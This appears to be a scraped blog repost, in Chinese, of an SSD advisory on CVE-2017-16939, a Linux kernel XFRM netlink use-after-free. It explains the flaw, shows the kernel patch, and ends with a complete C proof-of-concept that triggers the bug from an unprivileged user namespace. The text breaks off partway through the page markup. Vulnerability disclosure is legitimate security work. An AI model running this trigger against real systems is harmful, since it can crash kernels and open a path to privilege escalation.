{"id":10805,"date":"2017-12-11T14:19:08","date_gmt":"2017-12-11T22:19:08","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/12\/11\/news-4577\/"},"modified":"2017-12-11T14:19:08","modified_gmt":"2017-12-11T22:19:08","slug":"news-4577","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/12\/11\/news-4577\/","title":{"rendered":"SSD\u5b89\u5168\u516c\u544a-Linux\u5185\u6838XFRM\u6743\u9650\u63d0\u5347\u6f0f\u6d1e"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 11 Dec 2017 08:51:42 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3563\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3563');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>\u6f0f\u6d1e\u6982\u8981<\/strong><br \/> \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728Linux\u5185\u6838\u4e2d\u53d1\u73b0\u7684\u4e00\u4e2aUAF\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u63d0\u5347\u6743\u9650\u3002\u6f0f\u6d1e\u5b58\u5728\u4e8eNetlink \u5957\u63a5\u5b57\u5b50\u7cfb\u7edf \u2013 XFRM.<\/p>\n<p>Netlink\u7528\u4e8e\u5728\u5185\u6838\u548c\u7528\u6237\u7a7a\u95f4\u8fdb\u7a0b\u4e4b\u95f4\u4f20\u8f93\u4fe1\u606f\u3002 \u5b83\u7531\u7528\u6237\u7a7a\u95f4\u8fdb\u7a0b\u7684\u6807\u51c6\u57fa\u4e8e\u5957\u63a5\u5b57\u7684\u63a5\u53e3\u548c\u5185\u6838\u6a21\u5757\u7684\u5185\u90e8\u5185\u6838API\u7ec4\u6210\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u63d0\u4ea4\u8005<\/strong><\/p>\n<p>\u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u5458Mohamed Ghannam\u5411Beyond Security\u7684SSD\u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e<\/p>\n<p><strong>\u5382\u5546\u54cd\u5e94<\/strong><\/p>\n<p>\u8be5\u6f0f\u6d1e\u5df2\u5728\u8865\u4e011137b5e\u4e2d\u88ab\u4fee\u590d\uff08\u201cipsec\uff1a\u4fee\u590d\u4e2d\u6b62xfrm\u7b56\u7565\u8f6c\u50a8\u5d29\u6e83\u201d\uff09<\/p>\n<p>CVE: CVE-2017-16939<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a2f045be6348189898138\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  @@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr     static int xfrm_dump_policy_done(struct netlink_callback *cb)   {  &#8211;\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &amp;cb-&gt;args[1];  +\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb-&gt;args;   \tstruct net *net = sock_net(cb-&gt;skb-&gt;sk);      \txfrm_policy_walk_done(walk, net);   \treturn 0;   }     +static int xfrm_dump_policy_start(struct netlink_callback *cb)  +{  +\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb-&gt;args;  +  +\tBUILD_BUG_ON(sizeof(*walk) &gt; sizeof(cb-&gt;args));  +  +\txfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);  +\treturn 0;  +}  +   static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb)   {   \tstruct net *net = sock_net(skb-&gt;sk);  &#8211;\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &amp;cb-&gt;args[1];  +\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb-&gt;args;   \tstruct xfrm_dump_info info;     &#8211;\tBUILD_BUG_ON(sizeof(struct xfrm_policy_walk) &gt;  &#8211;\t\t     sizeof(cb-&gt;args) &#8211; sizeof(cb-&gt;args[0]));  &#8211;   \tinfo.in_skb = cb-&gt;skb;   \tinfo.out_skb = skb;   \tinfo.nlmsg_seq = cb-&gt;nlh-&gt;nlmsg_seq;   \tinfo.nlmsg_flags = NLM_F_MULTI;     &#8211;\tif (!cb-&gt;args[0]) {  &#8211;\t\tcb-&gt;args[0] = 1;  &#8211;\t\txfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);  &#8211;\t}  &#8211;   \t(void) xfrm_policy_walk(net, walk, dump_one_policy, &amp;info);      \treturn skb-&gt;len;   @@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = {      static const struct xfrm_link {   \tint (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **);  +\tint (*start)(struct netlink_callback *);   \tint (*dump)(struct sk_buff *, struct netlink_callback *);   \tint (*done)(struct netlink_callback *);   \tconst struct nla_policy *nla_pol;   @@ -2487,6 +2490,7 @@ static const struct xfrm_link {   \t[XFRM_MSG_NEWPOLICY   &#8211; XFRM_MSG_BASE] = { .doit = xfrm_add_policy    },   \t[XFRM_MSG_DELPOLICY   &#8211; XFRM_MSG_BASE] = { .doit = xfrm_get_policy    },   \t[XFRM_MSG_GETPOLICY   &#8211; XFRM_MSG_BASE] = { .doit = xfrm_get_policy,  +\t\t\t\t\t\t   .start = xfrm_dump_policy_start,   \t\t\t\t\t\t   .dump = xfrm_dump_policy,   \t\t\t\t\t\t   .done = xfrm_dump_policy_done },   \t[XFRM_MSG_ALLOCSPI    &#8211; XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi },   @@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,      \t\t{   \t\t\tstruct netlink_dump_control c = {  +\t\t\t\t.start = link-&gt;start,   \t\t\t\t.dump = link-&gt;dump,   \t\t\t\t.done = link-&gt;done,   \t\t\t};<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0099 seconds] -->  <\/p>\n<p><span id=\"more-3563\"><\/span><\/p>\n<p><strong>\u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f<\/strong><\/p>\n<p>\u975e\u7279\u6743\u7528\u6237\u53ef\u4ee5\u66f4\u6539Netlink \u5957\u63a5\u5b57\u5b50\u7cfb\u7edf XFRM sk-> sk_rcvbuf\u7684\u503c\uff08sk ==sock\u7ed3\u6784\u4f53\u5bf9\u8c61\uff09\u3002<\/p>\n<p>\u53ef\u4ee5\u901a\u8fc7setsockopt\uff08SO_RCVBUF\uff09\u66f4\u6539sk-> sk_rcvbuf\u7684\u503c\u4e3a\u7279\u5b9a\u7684\u8303\u56f4\u3002\u901a\u8fc7recvmsg\/recv\/read\u63a5\u6536\u6570\u636e\u65f6\uff0csk_rcvbuf\u8868\u793a\u63a5\u6536\u7f13\u51b2\u533a\u7684\u5927\u5c0f\u3002<\/p>\n<p>sk_rcvbuf\u503c\u662f\u5185\u6838\u4e3askb\uff08sk_buff\u7ed3\u6784\u4f53\u5bf9\u8c61\uff09\u5206\u914d\u7684\u5927\u5c0f\u3002<\/p>\n<p>skb-> trusize\u662f\u4e00\u4e2a\u53d8\u91cf\uff0c\u5b83\u4fdd\u6301\u5bf9\u5df2\u4f7f\u7528\u5185\u5b58\u7684\u8ffd\u8e2a\uff0c\u4e3a\u4e86\u907f\u514d\u5185\u5b58\u6d6a\u8d39\uff0c\u65b9\u4fbf\u7ba1\u7406\uff0c\u5185\u6838\u53ef\u4ee5\u5728\u8fd0\u884c\u65f6\u6539\u53d8skb\u7684\u5927\u5c0f\u3002<\/p>\n<p>\u4f8b\u5982\uff0c\u5982\u679c\u6211\u4eec\u5206\u914d\u4e00\u4e2a\u5927\u7684\u5957\u63a5\u5b57\u7f13\u51b2\u533a\uff08skb\uff09\uff0c\u800c\u6211\u4eec\u53ea\u63a5\u6536\u52301\u5b57\u8282\u5927\u5c0f\u7684\u6570\u636e\u5305\uff0c\u5185\u6838\u5c06\u901a\u8fc7\u8c03\u7528skb_set_owner_r\u6765\u8c03\u6574skb-> trusize\u7684\u5927\u5c0f\u3002<\/p>\n<p>\u901a\u8fc7\u8c03\u7528skb_set_owner_r\u4fee\u6539sk-> sk_rmem_alloc\uff08\u5f15\u7528\u81ea\u539f\u5b50\u53d8\u91cfsk-> sk_backlog.rmem_alloc\uff09\u3002<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1.jpg\" data-slb-active=\"1\" data-slb-asset=\"521610148\" data-slb-internal=\"0\" data-slb-group=\"3563\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-300x30.jpg\" alt=\"\" width=\"300\" height=\"30\" class=\"alignnone size-medium wp-image-3536\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-300x30.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-768x76.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-1024x101.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1.jpg 1511w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u5f53\u521b\u5efaXFRM netlink \u5957\u63a5\u5b57\u65f6\uff0c\u4f1a\u8c03\u7528xfrm_dump_policy\u51fd\u6570\uff0c\u5f53\u6211\u4eec\u5173\u95ed\u5957\u63a5\u5b57\u65f6\uff0cxfrm_dump_policy_done\u4f1a\u88ab\u8c03\u7528\u3002<\/p>\n<p>\u5f53netlink_sock\u5bf9\u8c61\u7684cb_running\u503c\u4e3atrue\u65f6\u8c03\u7528xfrm_dump_policy_done\u3002<\/p>\n<p>xfrm_dump_policy_done\u4f1a\u5c1d\u8bd5\u6e05\u7406\u7531netlink_callback\u5bf9\u8c61\u7ba1\u7406\u7684xfrm walk\u6761\u76ee\u3002<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2.jpg\" data-slb-active=\"1\" data-slb-asset=\"981765232\" data-slb-internal=\"0\" data-slb-group=\"3563\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-300x66.jpg\" alt=\"\" width=\"300\" height=\"66\" class=\"alignnone size-medium wp-image-3537\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-300x66.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-768x168.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-1024x225.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2.jpg 1527w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u5f53\u8c03\u7528netlink_skb_set_owner_r\uff08\u5982skb_set_owner_r\uff09\u65f6\uff0c\u5b83\u4f1a\u66f4\u65b0sk_rmem_alloc\u3002<\/p>\n<p>netlink_dump():<br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3.jpg\" data-slb-active=\"1\" data-slb-asset=\"1556966987\" data-slb-internal=\"0\" data-slb-group=\"3563\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-300x25.jpg\" alt=\"\" width=\"300\" height=\"25\" class=\"alignnone size-medium wp-image-3538\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-300x25.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-768x64.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-1024x86.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3.jpg 1517w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>\u5728\u4e0a\u9762\u7684\u4ee3\u7801\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u5f53sk-> sk_rcvbuf\u5c0f\u4e8esk_rmem_alloc\uff08\u6ce8\u610f\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7stockpot\u63a7\u5236sk-> sk_rcvbuf\uff09\u65f6\uff0cnetlink_dump()\u9a8c\u8bc1\u5931\u8d25\u3002<\/p>\n<p>\u5f53\u6ee1\u8db3sk-> sk_rcvbuf\u5c0f\u4e8esk_rmem_alloc\u65f6\uff0c\u4f1a\u8df3\u8f6c\u5230\u51fd\u6570\u7684\u7ed3\u5c3e\uff0c\u7136\u800ccb_running\u7684\u503c\u8fd8\u6ca1\u6709\u88ab\u66f4\u6539\u4e3afalse\uff0cnetlink_dump()\u51fd\u6570\u5c31\u8fd4\u56de\u4e86\u3002<\/p>\n<p>\u6b64\u65f6nlk-> cb_running\u4e3atrue\uff0c\u56e0\u6b64\u4f1a\u8c03\u7528xfrm_dump_policy_done()\u3002<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4.jpg\" data-slb-active=\"1\" data-slb-asset=\"1231943600\" data-slb-internal=\"0\" data-slb-group=\"3563\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" class=\"alignnone size-medium wp-image-3539\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-300x124.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-768x318.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-1024x424.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4.jpg 1320w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>nlk-> cb.done\u6307\u5411xfrm_dump_policy_done\uff0c\u503c\u5f97\u6ce8\u610f\u7684\u662f\u8fd9\u4e2a\u51fd\u6570\u5904\u7406\u4e00\u4e2a\u53cc\u5411\u94fe\u8868\uff0c\u6240\u4ee5\u5982\u679c\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u5f15\u7528\u4e00\u4e2a\u53ef\u63a7\u7684\u7f13\u51b2\u533a\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5b9e\u73b0\u4efb\u610f\u5185\u5b58\u8bfb\u5199\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u8bc1\u660e<\/strong><br \/> \u4e0b\u9762\u7684\u4ee3\u7801\u5728Ubuntu 17.04\u6d4b\u8bd5\u3002<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a2f045be6354547480509\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #define _GNU_SOURCE  #include &lt;string.h&gt;  #include &lt;stdio.h&gt;  #include &lt;stdlib.h&gt;  #include &lt;asm\/types.h&gt;  #include &lt;sys\/socket.h&gt;  #include &lt;netinet\/in.h&gt;  #include &lt;arpa\/inet.h&gt;  #include &lt;linux\/netlink.h&gt;  #include &lt;linux\/xfrm.h&gt;  #include &lt;sched.h&gt;  #include &lt;unistd.h&gt;    #define BUFSIZE 2048      int fd;  struct sockaddr_nl addr;    struct msg_policy {      struct nlmsghdr msg;      char buf[BUFSIZE];  };    void create_nl_socket(void)  {      fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM);      memset(&amp;addr,0,sizeof(struct sockaddr_nl));      addr.nl_family = AF_NETLINK;      addr.nl_pid = 0; \/* packet goes into the kernel *\/      addr.nl_groups = XFRMNLGRP_NONE; \/* no need for multicast group *\/    }    void do_setsockopt(void)  {      int var =0x100;        setsockopt(fd,1,SO_RCVBUF,&amp;var,sizeof(int));  }    struct msg_policy *init_policy_dump(int size)  {      struct msg_policy *r;        r = malloc(sizeof(struct msg_policy));      if(r == NULL) {          perror(&#8220;malloc&#8221;);          exit(-1);      }      memset(r,0,sizeof(struct msg_policy));        r-&gt;msg.nlmsg_len = 0x10;      r-&gt;msg.nlmsg_type = XFRM_MSG_GETPOLICY;      r-&gt;msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI |  NLM_F_REQUEST;      r-&gt;msg.nlmsg_seq = 0x1;      r-&gt;msg.nlmsg_pid = 2;      return r;    }  int send_msg(int fd,struct nlmsghdr *msg)  {      int err;      err = sendto(fd,(void *)msg,msg-&gt;nlmsg_len,0,(struct sockaddr*)&amp;addr,sizeof(struct sockaddr_nl));      if (err &lt; 0) {          perror(&#8220;sendto&#8221;);          return -1;      }      return 0;    }    void create_ns(void)  {  \tif(unshare(CLONE_NEWUSER) != 0) {  \t\tperror(&#8220;unshare(CLONE_NEWUSER)&#8221;);  \t\texit(1);  \t}  \tif(unshare(CLONE_NEWNET) != 0) {  \t\tperror(&#8220;unshared(CLONE_NEWUSER)&#8221;);  \t\texit(2);  \t}  }  int main(int argc,char **argv)  {      struct msg_policy *p;      create_ns();        create_nl_socket();      p = init_policy_dump(100);      do_setsockopt();      send_msg(fd,&amp;p-&gt;msg);      p = init_policy_dump(1000);      send_msg(fd,&amp;p-&gt;msg);      return 0;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" 